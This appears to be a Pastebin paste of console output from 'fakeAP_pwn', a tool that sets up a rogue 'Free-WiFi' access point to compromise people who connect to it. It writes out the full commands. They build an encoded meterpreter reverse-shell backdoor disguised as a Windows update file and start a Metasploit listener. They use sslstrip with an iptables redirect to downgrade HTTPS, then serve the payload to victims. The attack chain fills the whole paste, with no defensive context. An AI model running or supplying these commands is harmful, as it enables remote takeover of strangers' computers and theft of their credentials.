Advertisement
Guest User

FakeAP_RC10_output

a guest
Jul 8th, 2010
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.07 KB | None | 0 0
  1. [*] g0tmilk's fakeAP_pwn v0.3-RC10
  2. [>] Checking environment...
  3. [i] ESSID=Free-WiFi
  4. [i] fakeAPchannel=6
  5. [i] interface=wlan0
  6. [i] wifiInterface=wlan1
  7. [i] monitorInterface=mon0
  8. [i] payload=sdb
  9. [i] backdoorPath=/root/backdoor.exe
  10. [i] metasploitPath=/pentest/exploits/framework3
  11. [i] htdocs_folder=/var/www/fakeAP_pwn
  12. [i] mtu=1800
  13. [i] transparent=true
  14. [i] respond2All=false
  15. [i] fakeAPmac=true
  16. [i] extras=false
  17. [i] debug=false
  18. [i] verbose=2
  19. [i] gatewayIP=192.168.1.254
  20. [i] ourIP=192.168.1.67
  21. [i] port=21185
  22. [>] Stopping services and programs...
  23. [i] Command: killall dhcpd3 apache2 airbase-ng wicd-client
  24. [i] Command: /etc/init.d/dhcp3-server stop
  25. [i] Command: /etc/init.d/apache2 stop
  26. [>] Setting up wireless card...
  27. [i] Command: airmon-ng stop mon0
  28. [i] Command: ifconfig wlan1 down
  29. [i] Command: ifconfig wlan1 up
  30. [i] Command: airmon-ng start wlan1
  31. [>] Changing MAC Address...
  32. [i] Command: ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up
  33. [i] macAddress=24:43:b4:22:ec:a4 (unknown)
  34. [>] Creating scripts...
  35. [i] Created: /tmp/fakeAP_pwn.rb
  36. [i] Created: /etc/apache2/sites-available/fakeAP_pwn
  37. [>] Creating exploit...(Windows)
  38. [i] Command: /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /pentest/exploits/framework3/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe
  39. [>] Creating our fake access point...
  40. [i] Command: airbase-ng -c 6 -e "Free-WiFi" mon0 -v
  41. [>] Setting up our end...
  42. [i] Command: chmod 775 /var/run/
  43. [i] Command: touch /var/lib/dhcp3/dhcpd.leases
  44. [>] Starting Metasploit...
  45. [i] Command: /pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 AutoRunScript=/tmp/fakeAP_pwn.rb E
  46. [>] Starting SSLStrip...
  47. [i] Command: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  48. [i] Command: sslstrip -k -f -l 10000
  49. [>] Starting DHCP server...
  50. [i] Command: dhcpd3 -d -f -cf /tmp/fakeAP_pwn.dhcp at0
  51. [>] Starting Web server...
  52. [i] Command: /etc/init.d/apache2 start && ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeAP_pwn && /etc/init.d/apache2 reload
  53. [>] Forcing target to vist our site...
  54. [*] Waiting for target to connect...
  55.  
  56. [>] Cleaning up...
  57. [i] Command: ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && /etc/init.d/apache2 reload
  58. [>] Done! (= Have you... g0tmi1k?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement